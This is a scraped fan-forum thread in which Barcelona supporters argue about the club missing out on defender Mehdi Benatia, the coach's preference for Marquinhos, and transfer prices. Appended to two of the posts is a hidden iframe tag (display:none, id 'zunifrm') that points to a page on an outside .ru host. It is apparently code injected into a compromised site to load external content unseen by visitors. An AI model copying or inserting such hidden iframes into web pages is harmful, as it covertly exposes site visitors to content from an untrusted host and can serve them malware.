Mehdi Benatia

Hamzah

High Definition Member
Ok I'm assuming the guys were using logic which doesn't seem to be the case. Let's say they are, then they must have seen something in Benatia's game which makes him unsuited to how we try to play.

Luftstalag14

Culé de Celestial Empire
I wonder why Lucho did not want Benatia and insisted on getting Marquinhos. From the standpoint of acquiring targeted CB and RBs, it was a failure because we did not get either Marquinhos or Cuadrado.

But either way, I doubt that we would have landed Benatia for this low price.

messi2140

6racies Xavi
Some people are really making me laugh with their logic of " if he doesn't play or join barca he is overrated" or when they use this epic argument " have you seen him play? ". So wait we can't judge a player if we haven't seen him play a couple of matches ?? I can't judge a player by his statistics and what the people who watch him play say about him , what kind of f*cked up logic is that ? We can't judge Douglas cause I'm pretty sure no one saw him play.

To all the PC gamers if I asked you " what are your thoughts about GTA V ?". You would probably have formed an opinion about the game because you saw the reviews and what the other people who played it thought about it. It's not like you can't judge the game as a PC gamer because you've never played it.

Seriously guys , the board f*cked on this one. And stop using that silly argument of "have you seen him play"

Last edited:

CatalinR10

I was against the transfer because of the silly amount of money that was being quoted, but you're telling me the Board and Lucho could have gotten have for 30million euros?!!!

23tghnl.jpg

JamDav1982

Some people are really making me laugh with their logic of " if he doesn't play or join barca he is overrated" or when they use this epic argument " have you seen him play? ". So wait we can't judge a player if we haven't seen him play a couple of matches ?? I can't judge a player by his statistics and what the people who watch him play say about him , what kind of f*cked up logic is that ? We can't judge Douglas cause I'm pretty sure no one saw him play.

To all the PC gamers if I asked you " what are your thoughts about GTA V ?". You would probably have formed an opinion about the game because you saw the reviews and what the other people who played it thought about it. It's not like you can't judge the game as a PC gamer because you've never played it.

Seriously guys , the board f*cked on this one. And stop using that silly argument of "have you seen him play"

Or Lucho didnt want him.

Or Roma were asking for much more money earlier in the summer compared to now.

The board have seemingly given Lucho everything he wanted, or at least tried very hard to. What do you expect them to do over rule him and go for Benatia regardless?

Hamzah

High Definition Member

You need to watch a player play to know the subtleties of his game and make a proper opinion on him. Guys like darth just copy paste their opinions so they can't be taken seriously

Doobs

The Messiah
I'm convinced that we passed on the oppurtunity to sign Benatia because they wanted two RCB's and 2 LCB's. Pique and Bartra were not going to be changed. Benatia is right footed and of course better than Pique and Bartra combined but you know, La Masia.

If having two left footed defenders was so important for him then we wouldnt have been chasing Marquinhos for almost two months.

Benatia wouldn't have been able to play the Alves RB role now would he. I assume that he thought Marquinhos could.

And another thing is that we probably looked to play 3 at the back at some point and clearly that plan fell thru considering even Cuadrado is off the table now it seems. This is terribly disappointing but in Lucho I trust.<iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe>

Luftstalag14

Culé de Celestial Empire
I'm convinced that we passed on the oppurtunity to sign Benatia because they wanted two RCB's and 2 LCB's. Pique and Bartra were not going to be changed. Benatia is right footed and of course better than Pique and Bartra combined but you know, La Masia.

No way. He is good but let's not overrate him.

Bertus

Well, some people like me saw him play all season last year and keep saying he was one of the world best CBs last year, maybe even the best.

If they really get him for 24+6M, then screw the board. Because all this time we thought it was because he would cost 50-60M, which was not true. Even I got fooled that He would cost much, much more.

Won't say "gratz bayern" yet tho, because HE HAS NOT signed yet.

Last edited:
F

Flavia

It might have been timing, as well. At first roma were asking for a higher price, hoping someone would pay it. But no one did. And Bayern is bidding for him now only because Javi got seriously injured.
Same happened with Cuadrado... fiorentina got greedy, and will end up not selling him.
<iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe>

Home of Barca Fans